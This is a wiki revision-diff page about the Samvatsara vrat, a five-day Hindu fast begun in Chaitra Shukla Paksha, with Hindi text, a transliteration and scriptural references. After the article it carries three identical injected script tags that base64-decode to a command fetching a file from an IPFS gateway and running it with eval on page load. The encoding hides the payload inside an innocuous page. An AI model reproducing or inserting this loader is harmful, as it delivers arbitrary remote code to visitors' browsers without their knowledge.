Difference between revisions of "संवत्सर व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[चैत्र]] [[शुक्ल पक्ष]] पर संवत्सरव्रत आरम्भ होता है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] पर संवत्सरव्रत आरम्भ होता है।
 
*संवत्सरव्रत पाँच दिनों तक रखा जाता है।
 
*संवत्सरव्रत पाँच दिनों तक रखा जाता है।
Line 6: Line 6:
 
*संवत्सरव्रत में पाँच दिनो तक नक्त रहना चाहिए।
 
*संवत्सरव्रत में पाँच दिनो तक नक्त रहना चाहिए।
 
*अन्त में 5 सुवर्णों का दान करना चाहिए।
 
*अन्त में 5 सुवर्णों का दान करना चाहिए।
*यह पंचमूर्तिव्रत है।<ref>हेमाद्रि (व्रत खण्ड 2, 409-420, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>
+
*यह पंचमूर्तिव्रत है।<ref>हेमाद्रि (व्रत खण्ड 2, 409-420, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
 
*[[वेद|वैदिक]] [[साहित्य]] में एक युग के पाँच वर्षों को विभिन्न नाम दिये गये हैं।<ref>[[अथर्ववेद]] (6|55|3); तैत्तिरीय संहिता (5|7|2-3); [[तैत्तिरीय संहिता ब्राह्मण]] (1|4|10|1)।</ref>
 
*[[वेद|वैदिक]] [[साहित्य]] में एक युग के पाँच वर्षों को विभिन्न नाम दिये गये हैं।<ref>[[अथर्ववेद]] (6|55|3); तैत्तिरीय संहिता (5|7|2-3); [[तैत्तिरीय संहिता ब्राह्मण]] (1|4|10|1)।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh par sanvatsaravrat arambh hota hai.
  • sanvatsaravrat paanch dinoan tak rakha jata hai.
  • sanvatsaravrat mean agni, soory, som, prajapati evan maheshvar ko ek yug ke paanch varshoan ke roop mean mana gaya hai, yatha–sanvatsar, ishtapoort (idavatsar), anuvatsar evan uddhatsar.
  • unhean ek mandal mean kram se hom karana chahie.
  • sanvatsaravrat mean paanch dino tak nakt rahana chahie.
  • ant mean 5 suvarnoan ka dan karana chahie.
  • yah panchamoortivrat hai.[1]
  • vaidik sahity mean ek yug ke paanch varshoan ko vibhinn nam diye gaye haian.[2]


tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 409-420, vishnudharmottarapuran se uddharan
  2. atharvaved (6|55|3); taittiriy sanhita (5|7|2-3); taittiriy sanhita brahman (1|4|10|1).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>